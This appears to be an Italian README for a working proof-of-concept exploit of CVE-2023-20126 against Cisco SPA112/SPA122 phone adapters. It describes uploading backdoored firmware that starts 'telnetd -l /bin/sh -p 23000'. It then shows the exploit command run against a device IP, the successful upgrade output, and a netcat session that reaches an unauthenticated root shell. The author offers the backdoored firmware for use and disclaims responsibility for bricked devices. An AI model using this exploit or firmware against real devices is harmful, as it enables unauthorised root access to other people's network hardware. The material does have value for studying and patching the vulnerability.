
Exploit proof-of-concept per CVE-2023-20126 che mira agli adattatori telefonici Cisco SPA. Carica firmware dannoso per ottenere una shell root sulla porta 23000/tcp tramite telnetd.
PoC minimo funzionante per CVE-2023-20126
Questa è la versione iniziale. Funziona, ma è l'exploit del 'caso più semplice'.
Testato e funzionante su SPA112/SPA122 - SPA232D richiede un'immagine firmware diversa.
Fornisce una root-shell sulla porta 23000/tcp.
Devo ancora ripulire la toolchain usata per modificare il firmware e probabilmente la metterò in un repository diverso. È basata principalmente sul lavoro di @BigNerd95, ma con piccole modifiche per funzionare con i file firmware SPA112/122.
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
telnetd -l /bin/sh -p 23000, fornendo una root shell sulla porta 23000/tcp. Basata sul lavoro di bignerd95.WTFPL.
usare le issue di git.
Se questo brickka il tuo fottuto dispositivo, non mi assumo alcuna responsabilità.
È un TUO problema.
Voglio dire, ho messo insieme quel firmware backdoorato in una sera.
Inoltre, perché non stai seguendo il writeup e costruendo il tuo firmware backdoorato?